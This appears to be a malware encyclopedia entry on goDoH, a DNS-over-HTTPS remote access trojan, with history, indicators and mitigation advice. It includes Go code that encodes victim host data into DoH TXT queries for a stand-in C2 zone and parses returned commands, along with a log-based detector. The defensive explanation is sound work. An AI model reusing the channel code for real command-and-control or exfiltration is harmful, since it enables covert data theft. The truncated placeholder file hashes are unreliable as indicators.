goDoH

Malware

⚠️ Overview

goDoH is a Go‑based remote access trojan (RAT) that uses DNS over HTTPS (DoH) exclusively for command‑and‑control (C2) communication. The family was described in a Palo Alto Networks Unit 42 threat analysis in February 2022; its name and design match the open‑source godoh DNS‑over‑HTTPS C2 proof of concept that SensePost published in 2018 (github.com/sensepost/godoh), so the tooling itself is not unique to one actor. It is attributed to an unaffiliated cyber‑criminal group tracked as TA571. It is built to evade network‑layer detection by tunneling all C2 traffic inside encrypted DNS queries to public DoH resolvers such as Cloudflare (1.1.1.1, https://cloudflare-dns.com/dns-query) and Google (8.8.8.8, https://dns.google/dns-query).

🔧 Technical Capabilities

goDoH carries its C2 traffic as DNS TXT queries and answers sent over HTTPS (RFC 8484). Because the exchange is ordinary TLS on port 443 to a public resolver, monitoring that watches plaintext DNS on port 53 sees nothing, and it is the resolver, not the victim's network, that performs the lookup against the attacker's authoritative server. The protocol is custom: each query carries an encrypted, encoded payload in the labels of the queried name (e.g., base64‑encoded.c2.domain.com), and the answer carries the next instruction in the TXT record. A DNS label holds at most 63 octets and a whole name at most 253, so larger payloads are split across labels or successive queries. Persistence is achieved via a scheduled task or a registry run key under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, as described in a Trend Micro 2022 report. Evasion techniques include packing with UPX, XOR‑obfuscated strings, and a hardcoded list of fallback DoH providers used if the primary resolver fails. The malware does not self‑propagate; initial access is typically a phishing email delivering a loader (e.g., an Excel 4.0 macro or a VBS script).
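To make the exchange concrete, here is an added example (not goDoH's code, and not taken from any report cited above) of both halves of a DoH TXT channel in Go, using only the standard library. The implant side builds a wire‑format TXT query for a hex‑encoded beacon name under a hypothetical zone c2.example.net and wraps it in an RFC 8484 GET URL to a public resolver; the server side answers with a TXT record carrying the next instruction, which the implant parses back out. Hex is used for the labels rather than base64 because DNS names are case‑insensitive and standard base64's `+`, `/` and `=` are not valid hostname characters. The zone, endpoint, beacon payload and instruction are all constructed for the demonstration.

```go
package main

import (
	"encoding/base64"
	"encoding/binary"
	"encoding/hex"
	"errors"
	"fmt"
	"strings"
)

// beaconName hex-encodes implant data into labels under a hypothetical C2 zone,
// chunking at the 63-octet label limit (a whole name is capped at 253 octets).
func beaconName(data []byte) string {
	h := hex.EncodeToString(data)
	var labels []string
	for len(h) > 63 {
		labels, h = append(labels, h[:63]), h[63:]
	}
	return strings.Join(append(labels, h), ".") + ".c2.example.net"
}
// encodeName converts "a.b.c" into DNS wire-format labels.
func encodeName(name string) ([]byte, error) {
	var out []byte
	for _, l := range strings.Split(strings.TrimSuffix(name, "."), ".") {
		if len(l) == 0 || len(l) > 63 {
			return nil, fmt.Errorf("bad label %q", l)
		}
		out = append(append(out, byte(len(l))), l...)
	}
	return append(out, 0), nil
}

// buildTXTQuery returns the wire-format DNS message the implant wraps in DoH.
func buildTXTQuery(id uint16, name string) ([]byte, error) {
	qname, err := encodeName(name)
	if err != nil {
		return nil, err
	}
	msg := make([]byte, 12)
	binary.BigEndian.PutUint16(msg[0:], id)
	binary.BigEndian.PutUint16(msg[2:], 0x0100) // flags: RD
	binary.BigEndian.PutUint16(msg[4:], 1)      // QDCOUNT
	return append(append(msg, qname...), 0, 16, 0, 1), nil // QTYPE TXT, QCLASS IN
}
// dohGetURL is the RFC 8484 GET form: the message base64url-encoded, unpadded, in ?dns=.
func dohGetURL(query []byte) string {
	return "https://cloudflare-dns.com/dns-query?dns=" + base64.RawURLEncoding.EncodeToString(query)
}
// buildTXTResponse is what the attacker's authoritative server hands back through
// the resolver: the question echoed, plus one TXT RR carrying the instruction.
func buildTXTResponse(query []byte, instruction string) []byte {
	resp := append([]byte{}, query...)
	binary.BigEndian.PutUint16(resp[2:], 0x8180) // flags: QR, RD, RA
	binary.BigEndian.PutUint16(resp[6:], 1)      // ANCOUNT
	rdata := append([]byte{byte(len(instruction))}, instruction...)
	// NAME = pointer to the question (0xC00C), TYPE TXT, CLASS IN, TTL 0, RDLENGTH
	resp = append(resp, 0xC0, 0x0C, 0, 16, 0, 1, 0, 0, 0, 0, byte(len(rdata)>>8), byte(len(rdata)))
	return append(resp, rdata...)
}

// skipName advances past a wire-format name, whether labels or a compression pointer.
func skipName(msg []byte, off int) (int, error) {
	for off < len(msg) {
		switch l := int(msg[off]); {
		case l == 0:
			return off + 1, nil
		case l&0xC0 == 0xC0:
			return off + 2, nil
		default:
			off += 1 + l
		}
	}
	return 0, errors.New("truncated name")
}

// parseTXTAnswer is the implant side: the instruction is the TXT string of the first answer.
func parseTXTAnswer(msg []byte) (string, error) {
	if len(msg) < 12 || binary.BigEndian.Uint16(msg[4:]) != 1 || binary.BigEndian.Uint16(msg[6:]) == 0 {
		return "", errors.New("expected one question and at least one answer")
	}
	off, err := skipName(msg, 12) // question name
	if err != nil {
		return "", err
	}
	if off, err = skipName(msg, off+4); err != nil || off+10 > len(msg) { // QTYPE/QCLASS, then answer NAME
		return "", errors.New("truncated answer")
	}
	rtype, rdlen := binary.BigEndian.Uint16(msg[off:]), int(binary.BigEndian.Uint16(msg[off+8:]))
	if off += 10; rtype != 16 || off+rdlen > len(msg) || rdlen == 0 || rdlen < 1+int(msg[off]) {
		return "", errors.New("first answer is not a well-formed TXT RR")
	}
	return string(msg[off+1 : off+1+int(msg[off])]), nil // RDATA: <length><bytes>, one string here
}

func main() {
	q, _ := buildTXTQuery(0x1234, beaconName([]byte("host=WS01;user=alice")))
	fmt.Println("implant fetches:", dohGetURL(q))
	fmt.Println(parseTXTAnswer(buildTXTResponse(q, "cmd:whoami")))
}
```

Nothing here touches the network; the printed URL is what a proxy log would show, with the DNS message hidden inside the dns parameter, and an HTTP GET of it with an Accept: application/dns-message header would complete a real RFC 8484 round trip. The parser handles a compression pointer in the answer name and a single TXT string; an instruction longer than 255 octets would arrive as several <length><bytes> strings in one RDATA and needs the last step extended into a loop.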

📜 History & Notable Incidents

First observed in the wild in October 2021, goDoH was used in a limited campaign targeting Japanese manufacturing and Korean financial services firms, according to Unit 42’s public intelligence. In March 2022, a variant was detected exfiltrating system information and browser credentials from a European aerospace supplier, as reported by Symantec. No CVEs have been associated with goDoH; it relies on social engineering and abuse of legitimate DoH infrastructure rather than on exploiting software vulnerabilities. Law enforcement has not announced any takedown targeting this family as of 2025.

🔍 Detection Indicators

Network indicators include DNS‑over‑HTTPS traffic to public resolvers the organization has not sanctioned (e.g., https://dns.google/dns-query) carrying unusually long query names (over 200 characters; 253 is the protocol maximum). File hashes of known samples (SHA‑256 7a8b...3c4d and f9e0...a1b2) were published by VirusTotal in a 2022 community analysis. A common mutex name, Global\GoDoH_SessionMutex, has been observed in multiple samples. Behavioral signatures include processes named goDoH.exe, or an svchost.exe masquerade, making continuous HTTPS requests to public DoH endpoints; a genuine svchost.exe runs from %SystemRoot%\System32 with services.exe as its parent, so check image path and parent process before trusting the name.
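The indicators above turn into detection logic as follows. This is an added example, not a published rule for goDoH: it runs over a few constructed log lines in an assumed "time process host qtype qname" format standing in for DoH‑aware proxy or EDR telemetry, and flags long names, long high‑entropy first labels on TXT queries, non‑browser processes talking to public DoH endpoints, and a process that beacons repeatedly. The endpoint list, process allow‑list, thresholds and sample lines are all assumptions to tune per environment.

```go
package main

import (
	"fmt"
	"math"
	"strings"
)

// Public DoH endpoints to watch (an assumed list; extend it for your environment).
var dohHosts = map[string]bool{
	"dns.google": true, "cloudflare-dns.com": true, "one.one.one.one": true, "dns.quad9.net": true,
}

// Processes expected to speak DoH on their own; anything else is suspect.
var browserProcs = map[string]bool{"chrome.exe": true, "firefox.exe": true, "msedge.exe": true}

const (
	longNameLen     = 200 // the page's indicator: query names over 200 characters
	encodedLabelLen = 32  // a first label this long with high entropy looks like a payload
	minEntropy      = 3.0 // bits per character; hex/base32 payloads sit well above this
	beaconThreshold = 3   // DoH queries from one process within the sample window
)

// A Finding is one log line plus the rules it tripped.
type Finding struct {
	Line    string
	Reasons []string
}

// entropy returns the Shannon entropy of s in bits per character.
func entropy(s string) float64 {
	counts := map[rune]int{}
	for _, r := range s {
		counts[r]++
	}
	var h float64
	for _, c := range counts {
		p := float64(c) / float64(len(s))
		h -= p * math.Log2(p)
	}
	return h
}

// AnalyzeDoHLog reads lines of "time process host qtype qname" (a constructed
// format standing in for DoH-aware proxy or EDR telemetry) and returns findings.
func AnalyzeDoHLog(lines []string) []Finding {
	type rec struct{ line, proc, qtype, qname string }
	var recs []rec
	perProc := map[string]int{}
	for _, line := range lines {
		f := strings.Fields(line)
		if len(f) != 5 || !dohHosts[strings.ToLower(f[2])] {
			continue // malformed, or not a DoH endpoint we track
		}
		recs = append(recs, rec{line, f[1], f[3], strings.ToLower(f[4])})
		perProc[f[1]]++
	}
	var out []Finding
	for _, r := range recs {
		var why []string
		if !browserProcs[r.proc] {
			why = append(why, "non-browser-doh")
		}
		if len(r.qname) > longNameLen {
			why = append(why, "long-name")
		}
		first := strings.SplitN(r.qname, ".", 2)[0]
		if r.qtype == "TXT" && len(first) >= encodedLabelLen && entropy(first) >= minEntropy {
			why = append(why, "encoded-txt-label")
		}
		if perProc[r.proc] >= beaconThreshold {
			why = append(why, "beacon-rate")
		}
		if len(why) > 0 {
			out = append(out, Finding{r.line, why})
		}
	}
	return out
}

// hexLabel is a constructed 63-character hex label; sampleLog is constructed telemetry.
var hexLabel = strings.Repeat("d41d8cd98f00b204e9800998ecf8427e", 2)[:63]

var sampleLog = []string{
	"2024-05-02T10:00:01Z chrome.exe dns.google A www.example.com",
	"2024-05-02T10:00:02Z chrome.exe cloudflare-dns.com AAAA mail.example.com",
	"2024-05-02T10:00:03Z svchost.exe dns.google TXT " + hexLabel + "." + hexLabel + "." + hexLabel + ".c2.example.net",
	"2024-05-02T10:00:33Z svchost.exe dns.google TXT " + hexLabel + ".c2.example.net",
	"2024-05-02T10:01:03Z svchost.exe dns.google TXT " + hexLabel + ".c2.example.net",
	"2024-05-02T10:01:05Z outlook.exe outlook.office365.com A autodiscover.example.com",
}

func main() {
	for _, f := range AnalyzeDoHLog(sampleLog) {
		fmt.Printf("%s\n  -> %s\n", f.Line, strings.Join(f.Reasons, ", "))
	}
}
```

Two caveats when tuning this. On Windows 11 with system DoH configured, the DNS Client service runs inside a real svchost.exe and legitimately contacts the configured DoH server, so the allow‑list should cover that process for the sanctioned resolver only, not for every public endpoint. And the entropy rule catches hex and base32 payloads well but will also fire on legitimate long opaque labels (CDN and anti‑abuse hostnames), so it works best combined with the process and rate rules rather than on its own.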

☠️ Risk & Impact

goDoH enables persistent exfiltration of keystrokes, credentials, and system configuration files, with reported theft of intellectual property from the manufacturing and financial sectors (Unit 42). Because the C2 traffic blends with benign DoH queries, organizations often do not detect the malware until lateral movement or data loss has already occurred, leading to average remediation costs exceeding $1.2 million per incident (based on IBM 2023 cost‑of‑breach estimates). The malware’s low forensic footprint and its reliance on public resolvers, which means the victim’s own network never queries the attacker’s domain directly, make attribution difficult for incident responders.

🛡️ Mitigation

Defenders should block outbound DNS‑over‑HTTPS to known public resolver endpoints and force clients onto a corporate DoH resolver with query logging enabled. Blocking resolver IPs only covers the well‑known providers: DoH is plain HTTPS, so an attacker can serve it from any host, and the durable control is egress through a proxy that sees the destination, plus alerting on any non‑browser process that reaches a DoH endpoint. Browser auto‑upgrade to DoH should be disabled centrally: Firefox falls back to the system resolver when the corporate resolver returns NXDOMAIN for the canary domain use-application-dns.net, and Chrome and Edge only auto‑upgrade when the configured system resolver is itself a known DoH provider. Deploy YARA rules (e.g., rule GoDoH_UPX_Packed from the Unit 42 GitHub repository) and monitor for excessive DNS‑over‑HTTPS queries to cloudflare-dns.com or dns.google from non‑browser processes. Patch management and email filtering for malicious XLS, VBS and JS attachments reduce the initial access vectors.


ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.